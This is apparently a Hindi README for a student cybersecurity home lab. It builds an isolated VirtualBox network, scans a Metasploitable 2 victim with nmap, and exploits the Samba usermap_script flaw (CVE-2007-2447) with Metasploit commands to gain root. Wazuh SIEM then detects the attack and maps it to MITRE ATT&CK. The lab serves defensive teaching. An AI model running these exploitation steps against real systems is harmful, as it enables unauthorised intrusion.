
पृथक AD/Linux आक्रमण प्रयोगशाला: CVE-2007-2447 का शोषण Metasploit के माध्यम से किया गया, Wazuh SIEM द्वारा पता लगाया गया और MITRE ATT&CK (T1190, T1059) से मैप किया गया।
बी.टेक प्रोजेक्ट (बी.टी.पी) | आईआईआईटी पुणे आधारित: "डिजाइन और कार्यान्वयन: डिटेक्शन और मॉनिटरिंग के लिए एक प्रभावी साइबर सुरक्षा होम लैब" — ICCCNT 2023, IIT दिल्ली
एक पूरी तरह से कार्यात्मक साइबर सुरक्षा होम लैब, जो एक ही मशीन पर मुफ्त और ओपन-सोर्स टूल्स का उपयोग करके बनाई गई है। यह लैब वास्तविक दुनिया के हमले के जीवनचक्र — रिकॉनिसेंस → एक्सप्लॉयटेशन → डिटेक्शन — का अनुकरण करती है और दिखाती है कि कैसे एक SIEM हमलों का पता लगाकर उन्हें MITRE ATT&CK फ्रेमवर्क पर रीयल-टाइम में मैप कर सकता है।
┌─────────────────────────────────────────────────┐
│ VirtualBox — Internal Network │
│ (cyberlab, 10.0.0.x/24) │
│ │
│ ┌──────────┐ ┌──────────────┐ ┌──────────┐ │
│ │ Kali │ │ Metasploitable│ │ Ubuntu │ │
│ │ 10.0.0.1 │◄─►│ 10.0.0.2 │◄─►│ 10.0.0.3 │ │
│ │ ATTACKER │ │ VICTIM │ │ SIEM │ │
│ └──────────┘ └──────────────┘ └──────────┘ │
└─────────────────────────────────────────────────┘
Host-Only Adapter (192.168.56.103)
→ Wazuh Dashboard access from browser
VirtualBox में cyberlab नाम का एक Internal Network बनाएं। सभी तीन VMs को यह एडॉप्टर मिलता है। Ubuntu/Wazuh VM को एक अतिरिक्त Host-Only Adapter मिलता है ताकि आप अपने ब्राउज़र से डैशबोर्ड तक पहुंच सकें।
cyberlab इंटरनल नेटवर्क एडॉप्टर असाइन करें# Edit /etc/network/interfaces
auto eth0
iface eth0 inet static
address 10.0.0.1
netmask 255.255.255.0
sudo systemctl restart networkingcyberlab नेटवर्क असाइन करें# Edit /etc/network/interfaces
auto eth0
iface eth0 inet static
address 10.0.0.2
netmask 255.255.255.0
⚠️ Metasploitable 2 को कभी इंटरनेट से कनेक्ट न करें। यह जानबूझकर असुरक्षित है।
cyberlab इंटरनल + Host-Only/etc/netplan/01-network-manager-all.yaml):network:
version: 2
renderer: NetworkManager
ethernets:
enp0s3:
addresses:
- 10.0.0.3/24
enp0s8:
dhcp4: true
curl -sO https://packages.wazuh.com/4.7/wazuh-install.sh
sudo bash wazuh-install.sh -a
https://192.168.56.103 (होस्ट ब्राउज़र से)चूंकि Metasploitable 2 Wazuh एजेंट नहीं चला सकता, एजेंटलेस मॉनिटरिंग के लिए syslog फ़ॉरवर्डिंग कॉन्फ़िगर करें:
Metasploitable पर, /etc/rsyslog.conf में जोड़ें:
*.* @10.0.0.3:514
Wazuh (Ubuntu) पर, /var/ossec/etc/ossec.conf में syslog इनपुट सक्षम करें:
<remote>
<connection>syslog</connection>
<port>514</port>
<protocol>udp</protocol>
</remote>
Wazuh को पुनः प्रारंभ करें: sudo systemctl restart wazuh-manager
# From Kali
nmap -sV -O 10.0.0.2
Metasploitable 2 पर खोजी गई प्रमुख सेवाएँ:
20+ खुले पोर्ट खोजे गए। OS फिंगरप्रिंट: Linux 2.6.x
कमजोरी: CVE-2007-2447 — Samba usermap_script Command Injection
Samba 3.0.0–3.0.25rc3 पर दोषपूर्ण MS-RPC अनुरोधों के माध्यम से बिना प्रमाणीकरण के रिमोट कोड निष्पादन की अनुमति देता है।
# From Kali — launch Metasploit
msfconsole
# Inside Metasploit
use exploit/multi/samba/usermap_script
set RHOSTS 10.0.0.2
set LHOST 10.0.0.1
run
# Verify root access
whoami
# Output: root
एक्सप्लॉयट के बाद, Wazuh ने स्वचालित रूप से घटनाओं का पता लगाया और उन्हें MITRE ATT&CK पर मैप किया:
कुल घटनाएं पता चलीं: 55+
डैशबोर्ड तक पहुंचें https://192.168.56.103 → Security Events → MITRE ATT&CK
cybersecurity-home-lab/
│
├── README.md ← आप यहाँ हैं
├── network-config/
│ ├── kali-interfaces.txt ← Kali स्टैटिक IP कॉन्फ़िग
│ ├── metasploitable-interfaces.txt
│ └── ubuntu-netplan.yaml ← Ubuntu/SIEM नेटप्लान कॉन्फ़िग
├── wazuh-config/
│ └── ossec.conf ← Wazuh syslog/एजेंट कॉन्फ़िग
├── screenshots/
│ ├── nmap-scan.png
│ ├── metasploit-exploit.png
│ ├── wazuh-dashboard.png
│ └── wazuh-alerts-table.png
└── report/
└── ICCCNT_2023_paper.pdf ← संदर्भ शोध पत्र
Dadiyala, C. et al. (2023). डिजाइन और कार्यान्वयन: डिटेक्शन और मॉनिटरिंग के लिए एक प्रभावी साइबर सुरक्षा होम लैब। 14वां अंतर्राष्ट्रीय सम्मेलन कंप्यूटिंग, कम्युनिकेशन और नेटवर्किंग टेक्नोलॉजीज (ICCCNT), IIT दिल्ली। IEEE-56998।
यह लैब पूरी तरह से पृथक वर्चुअल मशीनों पर बनाई गई है जिनमें हमले के अनुकरण के दौरान इंटरनेट की पहुंच नहीं है। सभी उपकरण और तकनीकों का उपयोग केवल एक नियंत्रित वातावरण में शैक्षिक उद्देश्यों के लिए किया जाता है। उन प्रणालियों पर हमले की तकनीकों को दोहराने का प्रयास न करें जिनके आप मालिक नहीं हैं या जिनके परीक्षण के लिए आपके पास स्पष्ट अनुमति नहीं है।
प्रस्तुतकर्ता: हर्षिता वर्मा | आईआईआईटी पुणे
| VM |
|---|
| भूमिका |
|---|
| IP |
|---|
| उपकरण |
|---|
| Kali Linux 2026.1 | हमलावर | 10.0.0.1 | Nmap, Metasploit |
| Metasploitable 2 | पीड़ित | 10.0.0.2 | 20+ कमजोरियां |
| Ubuntu 22.04 + Wazuh | SIEM | 10.0.0.3 | Wazuh v4.7.5 |
| उपकरण | संस्करण | उद्देश्य |
|---|
| VirtualBox | 7.x | हाइपरवाइजर — एक होस्ट पर सभी VM चलाता है |
| Kali Linux | 2026.1 | पेनिट्रेशन टेस्टिंग OS (आक्रामक) |
| Metasploitable 2 | v2.0 | जानबूझकर असुरक्षित लक्ष्य |
| Wazuh | v4.7.5 | ओपन-सोर्स SIEM (रक्षात्मक) |
| Nmap | नवीनतम | नेटवर्क/पोर्ट स्कैनिंग |
| Metasploit Framework | नवीनतम | एक्सप्लॉयटेशन फ्रेमवर्क |
| पोर्ट | सेवा | संस्करण |
|---|
| 21/tcp | FTP | vsftpd 2.3.4 |
| 22/tcp | SSH | OpenSSH 4.7p1 |
| 80/tcp | HTTP | Apache 2.2.8 |
| 139/445 | SMB | Samba 3.x–4.x |
| 3306/tcp | MySQL | 5.0.51a |
| 5432/tcp | PostgreSQL | 8.3 |
| Rule ID | विवरण | MITRE तकनीक | रणनीति |
|---|
| 5402 | ROOT के लिए सफल sudo निष्पादित | T1548.003 | विशेषाधिकार वृद्धि |
| 5501 | PAM: लॉगिन सत्र खोला | T1078 | प्रारंभिक पहुंच / स्थिरता |
| 5502 | PAM: लॉगिन सत्र बंद | T1078 | रक्षा चोरी |
| 502 | Wazuh सर्वर प्रारंभ | — | डिटेक्शन सक्रिय |